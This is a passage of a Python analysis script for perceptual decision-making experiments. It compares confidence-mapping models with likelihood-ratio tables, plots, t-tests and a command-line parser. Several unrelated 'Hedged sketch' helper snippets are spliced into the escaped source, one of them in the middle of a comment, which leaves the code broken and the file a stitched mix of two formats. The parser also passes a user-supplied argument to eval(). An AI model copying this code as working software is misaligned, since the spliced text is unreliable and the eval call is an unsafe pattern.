utils.holm_bonferroni(pvals.reshape((-1))).reshape(sh)\n\tfor rects,pval,sign in zip(bars,pvals,signs):\n\t\tfor rect,p,si in zip(rects,pval,sign):\n\t\t\tsignificance_mark = ''\n\t\t\tif p<0.05:\n\t\t\t\tsignificance_mark+='*'\n\t\t\t\tif p<0.005:\n\t\t\t\t\tsignificance_mark+='*'\n\t\t\t\t\tif p<0.0005:\n\t\t\t\t\t\tsignificance_mark+='*'\n\t\t\theight = rect.get_height()\n\t\t\tx = rect.get_x() + rect.get_width()/2.\n\t\t\tax1.text(rect.get_x() + rect.get_width()/2., height, significance_mark,ha='center', va='bottom')\n\t\t\tax2.text(rect.get_x() + rect.get_width()/2., height*si, significance_mark,ha='center', va='bottom' if si>=0 else 'top')\n\tax1.set_xticks(group_center)\n\tax2.set_xticks(group_center)\n\tax1.set_xticklabels([parameter_aliases[par] for par in studied_parameters],fontsize=16)\n\tax2.set_xticklabels([parameter_aliases[par] for par in studied_parameters],fontsize=16)\n\tax1.set_ylabel('Absolute correlation')\n\tax2.set_ylabel('Correlation')\n\tax1.legend([r[0] for r in bars],[stat_aliases[stat] for stat in studied_stats],loc='best', fancybox=True, framealpha=0.5)\n\tax2.plot(ax2.get_xlim(),[0,0],'k')\n\tutils.maximize_figure()\n\tplt.show(True)\n\ndef compare_mappings():\n\texperiment_alias = {'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}\n\tall_lo = Analyzer(cmap_meth='log_odds').get_summary_stats_array()[1]\n\t# For some reason we dont have the fit result for the linear mapping\n\t# of 
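# --- Hedged sketch (illustrative): the star-annotation loop above can be
# isolated into a small helper so that both bar axes reuse it.
def significance_mark(p):
    """'*' for p<0.05, '**' for p<0.005, '***' for p<0.0005, else ''."""
    return '*' * sum(p < t for t in (0.05, 0.005, 0.0005))

def annotate_bars(ax, rects, pvals, signs=None):
    for i, (rect, p) in enumerate(zip(rects, pvals)):
        si = 1 if signs is None else signs[i]
        x = rect.get_x() + rect.get_width() / 2.
        ax.text(x, rect.get_height() * si, significance_mark(p),
                ha='center', va='bottom' if si >= 0 else 'top')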
experiment Luminancia subject 12 and session 1 (index 113 of lo)\n\t#~ all_lo = np.concatenate((all_lo[:113],all_lo[114:]),axis=0)\n\tall_li = Analyzer(cmap_meth='belief').get_summary_stats_array()[1]\n\tcat = 'experiment'\n\tucat_lo = np.unique(all_lo[cat])\n\tucat_li = np.unique(all_li[cat])\n\toutput = [['Experiment',r'$nLL\\left(\\mathcal{C}_{\\mathcal{L}_{o}}\\right)$',r'$nLL\\left(\\mathcal{C}_{s}\\right)$',r'$2\\log\\left(\\frac{\\mathcal{L}(\\mathcal{C}_{s})}{\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})}\\right)$']]\n\tall_lo_nLL = 0.\n\tall_li_nLL = 0.\n\tfor ucat in ucat_lo:\n\t\tlo = all_lo[ucat==all_lo[cat]]\n\t\tli = all_li[ucat==all_li[cat]]\n\t\ttotal_lo_nLL = np.sum(lo['full_confidence_merit'])\n\t\ttotal_li_nLL = np.sum(li['full_confidence_merit'])\n\t\tall_lo_nLL+= total_lo_nLL\n\t\tall_li_nLL+= total_li_nLL\n\t\tpercent_of_low_li = np.sum((lo['full_confidence_merit']>li['full_confidence_merit']).astype(float))/float(len(lo))*100\n\t\tlog_likelihood_ratio = lo['full_confidence_merit']-li['full_confidence_merit'] # The stored values are nLL so this is equal to log(li_like/lo_like)\n\t\t#~ print(ucat)\n\t\t#~ print('Overall log_odds mapping nLL = {0}'.format(total_lo_nLL))\n\t\t#~ print('Overall linear mapping nLL = {0}'.format(total_li_nLL))\n\t\t#~ print('Percent of experiment,subject,session tuples that are better explained with the linear mapping = {0}%'.format(percent_of_low_li))\n\t\t#~ print('Mean log likelihood ratio in favor of linear mapping = {0}'.format(np.mean(log_likelihood_ratio)))\n\t\t#~ print('Likelihood ratio T-value = {0}'.format(np.exp(np.mean(log_likelihood_ratio))))\n\t\t#~ print('Likelihood ratio p-value = {0}'.format(0.5*(1-stats.t.cdf(np.exp(np.mean(log_likelihood_ratio)),1))))\n\t\t#~ print('Total double log likelihood ratio = {0}'.format(2*np.sum(log_likelihood_ratio)))\n\t\t#~ print('Total log likelihood ratio Wilks p-value = {0}'.format(0.5*(1-stats.chi2.cdf(2*np.sum(log_likelihood_ratio),1))))\n\t\t\n\t\t#~ plt.hist(log_likelihood_ratio)\n\t\t#~ plt.xlabel('nLL(log_odds)-nLL(linear)')\n\t\t#~ plt.show(True)\n\t\toutput.append([experiment_alias[str(ucat).replace(' \\x00','')],'{0:.2f}'.format(total_lo_nLL),'{0:.2f}'.format(total_li_nLL),'{0:.2f}'.format(2*np.sum(log_likelihood_ratio))])\n\toutput.append([u'All','{0:.2f}'.format(all_lo_nLL),'{0:.2f}'.format(all_li_nLL),'{0:.2f}'.format(2*(all_lo_nLL-all_li_nLL))])\n\toutput = ' \\\\\\\\ \\\\hline\\n'.join([' & '.join(x) for x in output])+' \\\\\\\\ \\\\hline\\n'\n\tprint(output)\n\t\n\t\n\tcat = 'name'\n\tucat_lo = np.unique(all_lo[cat])\n\tucat_li = np.unique(all_li[cat])\n\toutput = [['Subject id',r'$nLL\\left(\\mathcal{C}_{\\mathcal{L}_{o}}\\right)$',r'$nLL\\left(\\mathcal{C}_{s}\\right)$',r'$2\\log\\left(\\frac{\\mathcal{L}(\\mathcal{C}_{s})}{\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})}\\right)$']]\n\tall_lo_nLL = 0.\n\tall_li_nLL = 0.\n\tdtype = ucat_lo.dtype\n\tucat_lo = np.sort(ucat_lo.astype(int)).astype(dtype)\n\tfor ucat in ucat_lo:\n\t\tlo = all_lo[ucat==all_lo[cat]]\n\t\tli = all_li[ucat==all_li[cat]]\n\t\ttotal_lo_nLL = np.sum(lo['full_confidence_merit'])\n\t\ttotal_li_nLL = np.sum(li['full_confidence_merit'])\n\t\tall_lo_nLL+= total_lo_nLL\n\t\tall_li_nLL+= total_li_nLL\n\t\tpercent_of_low_li = np.sum((lo['full_confidence_merit']>li['full_confidence_merit']).astype(float))/float(len(lo))*100\n\t\tlog_likelihood_ratio = lo['full_confidence_merit']-li['full_confidence_merit'] # The stored values are nLL so this is equal to log(li_like/lo_like)\n\t\t#~ print(ucat)\n\t\t#~ 
print('Overall log_odds mapping nLL = {0}'.format(total_lo_nLL))\n\t\t#~ print('Overall linear mapping nLL = {0}'.format(total_li_nLL))\n\t\t#~ print('Percent of experiment,subject,session tuples that are better explained with the linear mapping = {0}%'.format(percent_of_low_li))\n\t\t#~ print('Mean log likelihood ratio in favor of linear mapping = {0}'.format(np.mean(log_likelihood_ratio)))\n\t\t#~ print('Likelihood ratio T-value = {0}'.format(np.exp(np.mean(log_likelihood_ratio))))\n\t\t#~ print('Likelihood ratio p-value = {0}'.format(0.5*(1-stats.t.cdf(np.exp(np.mean(log_likelihood_ratio)),1))))\n\t\t#~ print('Total double log likelihood ratio = {0}'.format(2*np.sum(log_likelihood_ratio)))\n\t\t#~ print('Total log likelihood ratio Wilks p-value = {0}'.format(0.5*(1-stats.chi2.cdf(2*np.sum(log_likelihood_ratio),1))))\n\t\t\n\t\t#~ plt.hist(log_likelihood_ratio)\n\t\t#~ plt.xlabel('nLL(log_odds)-nLL(linear)')\n\t\t#~ plt.show(True)\n\t\toutput.append([str(ucat).replace(' \\x00',''),'{0:.2f}'.format(total_lo_nLL),'{0:.2f}'.format(total_li_nLL),'{0:.2f}'.format(2*np.sum(log_likelihood_ratio))])\n\toutput.append([u'All','{0:.2f}'.format(all_lo_nLL),'{0:.2f}'.format(all_li_nLL),'{0:.2f}'.format(2*(all_lo_nLL-all_li_nLL))])\n\toutput = ' \\\\\\\\ \\\\hline\\n'.join([' & '.join(x) for x in output])+' \\\\\\\\ \\\\hline\\n'\n\tprint(output)\n\t\n\t\n\tlabel_ind,ucat_lo_inds = utils.unique_rows(np.hstack((all_lo['experiment'][:,None],all_lo['session'][:,None])),return_index=True,return_inverse=True)[1:]\n\tucat_li_inds = utils.unique_rows(np.hstack((all_li['experiment'][:,None],all_li['session'][:,None])),return_inverse=True)[1]\n\toutput = [['Experiment session',r'$nLL\\left(\\mathcal{C}_{\\mathcal{L}_{o}}\\right)$',r'$nLL\\left(\\mathcal{C}_{s}\\right)$',r'$2\\log\\left(\\frac{\\mathcal{L}(\\mathcal{C}_{s})}{\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})}\\right)$']]\n\tall_lo_nLL = 0.\n\tall_li_nLL = 0.\n\tucat_label = sorted([' '.join([experiment_alias[str(x['experiment']).strip(' \\x00')],'Ses='+str(x['session']).strip(' \\x00')]) for x in all_lo[label_ind]])\n\tdtype = ucat_lo.dtype\n\tucat_lo = np.sort(ucat_lo.astype(int)).astype(dtype)\n\tfor ind,ucat in enumerate(ucat_label):\n\t\tlo = all_lo[ucat_lo_inds==ind]\n\t\tli = all_li[ucat_li_inds==ind]\n\t\ttotal_lo_nLL = np.sum(lo['full_confidence_merit'])\n\t\ttotal_li_nLL = np.sum(li['full_confidence_merit'])\n\t\tall_lo_nLL+= total_lo_nLL\n\t\tall_li_nLL+= total_li_nLL\n\t\tpercent_of_low_li = np.sum((lo['full_confidence_merit']>li['full_confidence_merit']).astype(float))/float(len(lo))*100\n\t\tlog_likelihood_ratio = lo['full_confidence_merit']-li['full_confidence_merit'] # The stored values are nLL so this is equal to log(li_like/lo_like)\n\t\t#~ print(ucat)\n\t\t#~ print('Overall log_odds mapping nLL = {0}'.format(total_lo_nLL))\n\t\t#~ print('Overall linear mapping nLL = {0}'.format(total_li_nLL))\n\t\t#~ print('Percent of experiment,subject,session tuples that are better explained with the linear mapping = {0}%'.format(percent_of_low_li))\n\t\t#~ print('Mean log likelihood ratio in favor of linear mapping = {0}'.format(np.mean(log_likelihood_ratio)))\n\t\t#~ print('Likelihood ratio T-value = {0}'.format(np.exp(np.mean(log_likelihood_ratio))))\n\t\t#~ print('Likelihood ratio p-value = {0}'.format(0.5*(1-stats.t.cdf(np.exp(np.mean(log_likelihood_ratio)),1))))\n\t\t#~ print('Total double log likelihood ratio = {0}'.format(2*np.sum(log_likelihood_ratio)))\n\t\t#~ print('Total log likelihood ratio Wilks p-value = 
{0}'.format(0.5*(1-stats.chi2.cdf(2*np.sum(log_likelihood_ratio),1))))\n\t\t\n\t\t#~ plt.hist(log_likelihood_ratio)\n\t\t#~ plt.xlabel('nLL(log_odds)-nLL(linear)')\n\t\t#~ plt.show(True)\n\t\toutput.append([str(ucat).replace(' \\x00',''),'{0:.2f}'.format(total_lo_nLL),'{0:.2f}'.format(total_li_nLL),'{0:.2f}'.format(2*np.sum(log_likelihood_ratio))])\n\toutput.append([u'All','{0:.2f}'.format(all_lo_nLL),'{0:.2f}'.format(all_li_nLL),'{0:.2f}'.format(2*(all_lo_nLL-all_li_nLL))])\n\toutput = ' \\\\\\\\ \\\\hline\\n'.join([' & '.join(x) for x in output])+' \\\\\\\\ \\\\hline\\n'\n\tprint(output)\n\ndef mapping_strengths_and_weaknesses(analyzer_kwargs={}):\n\tlinear_kwargs = analyzer_kwargs.copy()\n\tlinear_kwargs['cmap_meth'] = 'belief'\n\tlog_odds_kwargs = analyzer_kwargs.copy()\n\tlog_odds_kwargs['cmap_meth'] = 'log_odds'\n\tali = Analyzer(**linear_kwargs)\n\talo = Analyzer(**log_odds_kwargs)\n\texpli,teoli = ali.get_summary_stats_array()\n\texplo,teolo = alo.get_summary_stats_array()\n\tcompared_keys = ['rt_mean', 'hit_rt_mean', 'miss_rt_mean',\n\t\t\t\t\t 'auc', 'confidence_mean',\n\t\t\t\t\t 'hit_confidence_mean', 'miss_confidence_mean']\n\t\n\tplt.figure(figsize=(11,8))\n\tgs0 = gridspec.GridSpec(2,1,left=0.08, right=0.98,hspace=0.35, bottom=0.10, top=0.95)\n\tgs00 = gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0])\n\tgs10 = gridspec.GridSpecFromSubplotSpec(1, 4, subplot_spec=gs0[1])\n\tcompared_keys_axes = [gs00[0],gs00[1],gs00[2],\n\t\t\t\t\t\t gs10[0],gs10[1],gs10[2],gs10[3]]\n\tcompared_keys_titles = [r'$\\left\\langle RT\\right\\rangle$', r'$\\left\\langle RT|hit\\right\\rangle$', r'$\\left\\langle RT|miss\\right\\rangle$',\n\t\t\t\t\t 'AUC', r'$\\left\\langle conf\\right\\rangle$',\n\t\t\t\t\t r'$\\left\\langle conf|hit\\right\\rangle$', r'$\\left\\langle conf|miss\\right\\rangle$']\n\tcompared_keys_xlabels = ['Theoretical']*7\n\tcompared_keys_ylabels = ['Experimental','','','Experimental','','','']\n\tsuppressed_yticklabels = [False,True,True,\n\t\t\t\t\t\t False,False,True,True]\n\taxp = None\n\taxs = []\n\tuexp = np.unique(teoli['experiment'])\n\tfor k,gs,tit,xlabel,ylabel,sup_tick in zip(compared_keys,compared_keys_axes,compared_keys_titles,compared_keys_xlabels,compared_keys_ylabels,suppressed_yticklabels):\n\t\tif not sup_tick:\n\t\t\tax = plt.subplot(gs)\n\t\telse:\n\t\t\tax = plt.subplot(gs,sharex=axp,sharey=axp)\n\t\tif k.endswith('_mean'):\n\t\t\tax.errorbar(teoli[k],expli[k],yerr=expli[k.replace('_mean','_std')],fmt='.b')\n\t\t\tax.errorbar(teolo[k],explo[k],explo[k.replace('_mean','_std')],fmt='.r')\n\t\telse:\n\t\t\tax.plot(teoli[k],expli[k],'ob')\n\t\t\tax.plot(teolo[k],explo[k],'or')\n\t\tax.set_title(tit)\n\t\tax.set_xlabel(xlabel)\n\t\tax.set_ylabel(ylabel)\n\t\tif sup_tick:\n\t\t\tax.tick_params(labelleft=False)\n\t\telse:\n\t\t\taxp = ax\n\t\tif k=='rt_mean':\n\t\t\tax.legend([r'$\\mathcal{L}(\\mathcal{C}_{s})$',r'$\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})$'],loc='best', fancybox=True, framealpha=0.5)\n\t\taxs.append(ax)\n\tfor ax in axs:\n\t\tlims = [0,0]\n\t\tlims[0] = np.min([ax.get_xlim()[0],ax.get_ylim()[0]])\n\t\tlims[1] = np.max([ax.get_xlim()[1],ax.get_ylim()[1]])\n\t\tax.plot(lims,lims,'--k')\n\t\tax.set_xlim(lims)\n\t\tax.set_ylim(lims)\n\t\n\t#~ chi2li = []\n\t#~ chi2lo = []\n\t#~ for k in compared_keys:\n\t\t#~ if k.endswith('_mean'):\n\t\t\t#~ chi2li.append(np.sum((teoli[k]-expli[k]/expli[k.replace('_mean','_std')])**2))\n\t\t\t#~ chi2lo.append(np.sum((teolo[k]-explo[k]/explo[k.replace('_mean','_std')])**2))\n\t\t#~ else:\n\t\t\t#~ 
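# --- Hedged sketch (not from the original source): the tables above report
# 2*log-likelihood ratios between the two confidence mappings. Since the stored
# merits are negative log-likelihoods (nLL), the statistic and a Wilks
# chi-squared p-value (df assumed to be 1, the difference in free parameters)
# would be computed as:
from scipy import stats

def wilks_test(nll_restricted, nll_full, df=1):
    lr = 2.0 * (nll_restricted - nll_full)   # 2*log(L_full / L_restricted)
    return lr, stats.chi2.sf(lr, df)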
chi2li.append(np.sum((teoli[k]-expli[k])**2))\n\t\t\t#~ chi2lo.append(np.sum((teolo[k]-explo[k])**2))\n\t#~ chi2li = np.array(chi2li)\n\t#~ chi2lo = np.array(chi2lo)\n\t#~ plt.figure()\n\t#~ plt.subplot(121)\n\t#~ plt.bar(np.arange(len(chi2li)),chi2li/(chi2li+chi2lo),width=0.45,color='b')\n\t#~ plt.bar(np.arange(len(chi2lo))+0.45,chi2lo/(chi2li+chi2lo),width=0.40,color='r')\n\t#~ plt.subplot(122)\n\t#~ plt.bar(np.arange(len(chi2lo)),chi2li-chi2lo,color='r')\n\t#~ print((chi2li-chi2lo)[3])\n\t\n\tplt.figure(figsize=(11,8))\n\tcompared_keys_xlabels = [r'$\\left\\langle RT\\right\\rangle_{theo}-\\left\\langle RT\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle RT|hit\\right\\rangle_{theo}-\\left\\langle RT|hit\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle RT|miss\\right\\rangle_{theo}-\\left\\langle RT|miss\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'AUC$_{theo}$-AUC$_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle conf\\right\\rangle_{theo}-\\left\\langle conf\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle conf|hit\\right\\rangle_{theo}-\\left\\langle conf|hit\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle conf|miss\\right\\rangle_{theo}-\\left\\langle conf|miss\\right\\rangle_{exp}$']\n\t\n\tcompared_keys_ylabels = ['Count','','','Count','','','']\n\tfor k,gs,xlabel,ylabel,sup_tick in zip(compared_keys,compared_keys_axes,compared_keys_xlabels,compared_keys_ylabels,suppressed_yticklabels):\n\t\t#~ print(k)\n\t\tif not sup_tick:\n\t\t\tax = plt.subplot(gs)\n\t\telse:\n\t\t\tax = plt.subplot(gs,sharey=axp)\n\t\tedges = np.histogram(np.array([teoli[k]-expli[k],teolo[k]-explo[k]]),bins=20)[1]\n\t\tcenters = np.array([0.5*(e1+e0) for e1,e0 in zip(edges[1:],edges[:-1])])\n\t\thistli = np.histogram(teoli[k]-expli[k],bins=edges,density=True)[0]\n\t\thistlo = np.histogram(teolo[k]-explo[k],bins=edges,density=True)[0]\n\t\tax.step(edges,np.hstack((histli,histli[-1:])),'b',where='post')\n\t\tax.step(edges,np.hstack((histlo,histlo[-1:])),'r',where='post')\n\t\ttli = [0]\n\t\ttlo = [0]\n\t\tpli = [0]\n\t\tplo = [0]\n\t\ttli[0],pli[0] = stats.ttest_1samp(teoli[k]-expli[k],0.)\n\t\ttlo[0],plo[0] = stats.ttest_1samp(teolo[k]-explo[k],0.)\n\t\tfor exp in uexp:\n\t\t\tindsli = teoli['experiment']==exp\n\t\t\tindslo = teolo['experiment']==exp\n\t\t\ttemp1,temp2 = stats.ttest_1samp(teoli[k][indsli]-expli[k][indsli],0.)\n\t\t\ttli.append(temp1)\n\t\t\tpli.append(temp2)\n\t\t\ttemp1,temp2 = stats.ttest_1samp(teolo[k][indslo]-explo[k][indslo],0.)\n\t\t\ttlo.append(temp1)\n\t\t\tplo.append(temp2)\n\t\tpv = np.array([np.array(pli),np.array(plo)])\n\t\tpv = utils.holm_bonferroni(pv)\n\t\tprint(pv.reshape((2,-1)).T)\n\t\tprint('{0}, {1} ({2}), {3} ({4})'.format(k,tli[0],pli[0],tlo[0],plo[0]))\n\t\tfor i,exp in enumerate(uexp):\n\t\t\tprint('{0} ({5}), {1} ({2}), {3} ({4})'.format(k,tli[1+i],pli[1+i],tlo[1+i],plo[1+i],exp))\n\t\tlims = list(ax.get_ylim())\n\t\tlims[0] = 0.\n\t\tax.set_ylim(lims)\n\t\tax.set_xlabel(xlabel)\n\t\tax.set_ylabel(ylabel)\n\t\tif sup_tick:\n\t\t\tax.tick_params(labelleft=False)\n\t\telse:\n\t\t\taxp = ax\n\t\tif k=='rt_mean':\n\t\t\tax.legend([r'$\\mathcal{L}(\\mathcal{C}_{s})$',r'$\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})$'],loc='best', fancybox=True, framealpha=0.5)\n\t\n\tplt.show(True)\n\ndef test():\n\tmapping_strengths_and_weaknesses()\n\t#~ compare_mappings()\n\treturn\n\ta = Analyzer(cmap_meth='belief')\n\ta.get_parameter_array_from_summary(normalize={'internal_var':'experiment','dead_time':'name','dead_time_sigma':'session'})\n\ttree = 
a.cluster(merge='names',clustered_parameters=['high_confidence_threshold','confidence_map_slope'])\n\t#~ tree.copy().render('cluster_test.svg',tree_style=default_tree_style(mode='r'), layout=default_tree_layout)\n\ttree.show(tree_style=default_tree_style(mode='r'))\n\ttree = a.cluster(merge='sessions',clustered_parameters=['high_confidence_threshold','confidence_map_slope'])\n\t#~ tree.copy().render('cluster_test.svg',tree_style=default_tree_style(mode='c'), layout=default_tree_layout)\n\ttree.show(tree_style=default_tree_style(mode='c'))\n\ttree = a.cluster(clustered_parameters=['high_confidence_threshold','confidence_map_slope'])\n\t#~ tree.copy().render('cluster_test.svg',tree_style=default_tree_style(mode='c'), layout=default_tree_layout)\n\ttree.show(tree_style=default_tree_style(mode='c'))\n\ta.scatter_parameters(show=True)\n\ta.scatter_parameters(merge='names',show=True)\n\ta.scatter_parameters(merge='sessions',show=True)\n\ta.set_pooling_func(np.median)\n\ta.scatter_parameters(show=True)\n\ta.scatter_parameters(merge='names',show=True)\n\ta.scatter_parameters(merge='sessions',show=True)\n\t#~ unams,indnams = np.unique(a._names,return_inverse=True)\n\t#~ uexps,indexps = np.unique(a._experiments,return_inverse=True)\n\t#~ usess,indsess = np.unique(a._sessions,return_inverse=True)\n\t\n\t#~ for un in unams:\n\t\t#~ inds = a._names==un\n\t\t#~ pars = a._parameters[inds]\n\t\t#~ cost = pars[:,a._parameter_names.index('cost')]\n\t\t#~ internal_var = pars[:,a._parameter_names.index('internal_var')]\n\t\t#~ phase_out_prob = pars[:,a._parameter_names.index('phase_out_prob')]\n\t\t#~ high_confidence_threshold = pars[:,a._parameter_names.index('high_confidence_threshold')]\n\t\t#~ confidence_map_slope = pars[:,a._parameter_names.index('confidence_map_slope')]\n\t\t#~ plt.figure(figsize=(10,10))\n\t\t#~ ax1 = plt.subplot(221)\n\t\t#~ ax2 = plt.subplot(222)\n\t\t#~ ax3 = plt.subplot(223)\n\t\t#~ ax4 = plt.subplot(224)\n\t\t#~ for us,marker in zip(usess,['o','s','D']):\n\t\t\t#~ inds2 = a._sessions[inds]==us\n\t\t\t#~ if any(inds2):\n\t\t\t\t#~ colors = [{'2AFC':'r','Auditivo':'g','Luminancia':'b'}[str(x).strip('\\x00')] for x in a._experiments[inds][inds2]]\n\t\t\t\t#~ ax1.scatter(cost[inds2],internal_var[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t\t\t#~ ax2.scatter(cost[inds2],phase_out_prob[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t\t\t#~ ax3.scatter(internal_var[inds2],phase_out_prob[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t\t\t#~ ax4.scatter(confidence_map_slope[inds2],high_confidence_threshold[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t#~ ax1.set_xlabel('cost')\n\t\t#~ ax1.set_ylabel('internal_var')\n\t\t#~ ax2.set_xlabel('cost')\n\t\t#~ ax2.set_ylabel('phase_out_prob')\n\t\t#~ ax3.set_xlabel('internal_var')\n\t\t#~ ax3.set_ylabel('phase_out_prob')\n\t\t#~ ax3.legend()\n\t\t#~ ax4.set_xlabel('confidence_map_slope')\n\t\t#~ ax4.set_ylabel('high_confidence_threshold')\n\t\t#~ plt.suptitle('Subject: '+str(un))\n\t\t#~ plt.show(True)\n\ndef parse_input():\n\tscript_help = \"\"\" moving_bounds_fits.py help\n Syntax:\n moving_bounds_fits.py [option flag] [option value]\n \n moving_bounds_fits.py -h [or --help] displays help\n \n Optional arguments are:\n '--show': This flag takes no values. If present, it displays the plotted figure\n and freezes execution until the figure is closed.\n '--test': This flag takes no values. If present, the script's test suite is\n executed.\n '-w': Override the existing saved summary file. 
If the flag '-w' is\n supplied, the script will override the saved summary file. If this\n flag is not supplied, the script will attempt to load the summary\n and if it fails, it will produce the summary file. WARNING:\n the generation of the summary file takes a very long time.\n '-m' or '--method': String that identifies the fit method. Available values are full,\n confidence_only and full_confidence. [Default 'full_confidence']\n '-o' or '--optimizer': String that identifies the optimizer used for fitting.\n Available values are 'cma' and all the scipy.optimize.minimize methods.\n [Default 'cma']\n '-sf' or '--suffix': A string suffix to paste to the filenames. [Default '']\n '-e' or '--extension': A string that determines the graphics file format\n in which the tree graph will be saved. Available\n extensions are 'pdf', 'png' or 'svg'. [Default 'svg']\n '-n' or '--n_clusters': An integer that specifies the number of clusters\n constructed by the scikit-learn AgglomerativeClustering\n class. [Default 2]\n '-a' or '--affinity': The scikit-learn AgglomerativeClustering class affinity\n possible values are 'euclidean', 'l1', 'l2', 'cosine',\n 'manhattan' or 'precomputed'. If linkage is 'ward',\n only 'euclidean' is accepted. Refer to the scikit-learn\n documentation for more information. [Default 'euclidean']\n '-l' or '--linkage': The scikit-learn AgglomerativeClustering class linkage\n possible values are 'ward', 'complete' or 'average'.\n Refer to the scikit-learn documentation for more\n information. [Default 'ward']\n '-pf' or '--pooling_func': The scikit-learn AgglomerativeClustering class pooling_func.\n Default is np.nanmean (notice that numpy is\n aliased as np when supplying an option).\n The pooling_func is also used when scattering\n the parameters but this functionality is only\n accessible when importing the analysis.py package.\n '--merge': Can be 'none', 'experiments', 'sessions' or 'names'. This option\n controls if the fitted model parameters should be pooled together\n or not, and how they should be pooled. If 'none', the parameters are not\n pooled together. The parameters have three separate categories:\n the experiment to which they belong, the subject name and the\n experimental session. If the supplied option value is 'experiments',\n 'sessions' or 'names', the parameters that belong to different\n categories of the supplied option value will be pooled together\n using the pooling_func. For example, if the option value is\n 'names', the parameters will still distinguish the experiment\n and session, but the parameters for different subject names will\n be pooled together. [Default 'names']\n '-f' or '--filter_nans': Can be 'pre', 'post' or 'none'. This option controls\n how to filter the parameters that are nans. If 'none',\n no filter is applied. If 'pre', the parameters\n that contain a nan entry are filtered before\n reducing the parameters to the clustered parameter\n space. If 'post', the parameters that contain a\n nan entry are filtered after the reduction takes\n place. [Default 'post']\n '-t' or '--tree_mode': Can be 'r' or 'c' and controls how to plot the\n cluster hierarchy. If 'r', the tree is plotted\n in rectangular mode. 
If 'c', the tree is plotted\n in circular mode.\n Example:\n python analysis.py --show -pf np.nanmedian\"\"\"\n\tstr_caster = lambda x: str(x).lower()\n\tint_caster = int\n\tevaler = eval\n\tavailable_options_casters = {'method':str_caster,\\\n\t\t\t\t\t\t\t\t'optimizer':str_caster,\\\n\t\t\t\t\t\t\t\t'suffix':str_caster,\\\n\t\t\t\t\t\t\t\t'extension':str_caster,\\\n\t\t\t\t\t\t\t\t'override':None,\\\n\t\t\t\t\t\t\t\t'n_clusters':int_caster,\\\n\t\t\t\t\t\t\t\t'affinity':str_caster,\\\n\t\t\t\t\t\t\t\t'linkage':str_caster,\\\n\t\t\t\t\t\t\t\t'pooling_func':evaler,\\\n\t\t\t\t\t\t\t\t'merge':str_caster,\\\n\t\t\t\t\t\t\t\t'filter_nans':str_caster,\\\n\t\t\t\t\t\t\t\t'tree_mode':str_caster,\\\n\t\t\t\t\t\t\t\t'show':None,\\\n\t\t\t\t\t\t\t\t'test':None}\n\toptions = {'test':False,'override':False,'show':False}\n\texpecting_key = True\n\tkey = None\n\tif len(sys.argv)==1:\n\t\toptions['test'] = True\n\tfor i,arg in enumerate(sys.argv[1:]):\n\t\tif expecting_key:\n\t\t\tif arg=='--test':\n\t\t\t\toptions['test'] = True\n\t\t\telif arg=='-w' or arg=='--override':\n\t\t\t\toptions['override'] = True\n\t\t\telif arg=='--show':\n\t\t\t\toptions['show'] = True\n\t\t\telif arg=='-m' or arg=='--method':\n\t\t\t\tkey = 'method'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-o' or arg=='--optimizer':\n\t\t\t\tkey = 'optimizer'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-sf' or arg=='--suffix':\n\t\t\t\tkey = 'suffix'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-e' or arg=='--extension':\n\t\t\t\tkey = 'extension'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-n' or arg=='--n_clusters':\n\t\t\t\tkey = 'n_clusters'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-a' or arg=='--affinity':\n\t\t\t\tkey = 'affinity'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-l' or arg=='--linkage':\n\t\t\t\tkey = 'linkage'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-pf' or arg=='--pooling_func':\n\t\t\t\tkey = 'pooling_func'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='--merge':\n\t\t\t\tkey = 'merge'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-f' or arg=='--filter_nans':\n\t\t\t\tkey = 'filter_nans'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-t' or arg=='--tree_mode':\n\t\t\t\tkey = 'tree_mode'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-h' or arg=='--help':\n\t\t\t\tprint(script_help)\n\t\t\t\tsys.exit()\n\t\t\telse:\n\t\t\t\traise RuntimeError(\"Unknown option: {opt} encountered in position {pos}. 
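# --- Hedged sketch (illustrative alternative, not the author's code): the
# hand-rolled flag loop in parse_input above maps almost one-to-one onto
# argparse, which would also generate the help text automatically. Only a
# subset of the options is shown:
import argparse

def parse_input_argparse():
    p = argparse.ArgumentParser(prog='analysis.py')
    p.add_argument('--show', action='store_true')
    p.add_argument('--test', action='store_true')
    p.add_argument('-w', '--override', action='store_true')
    p.add_argument('-m', '--method', default='full_confidence')
    p.add_argument('-o', '--optimizer', default='cma')
    p.add_argument('-n', '--n_clusters', type=int, default=2)
    p.add_argument('--merge', default='names',
                   choices=['none', 'experiments', 'sessions', 'names'])
    p.add_argument('-f', '--filter_nans', default='post',
                   choices=['pre', 'post', 'none'])
    return vars(p.parse_args())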
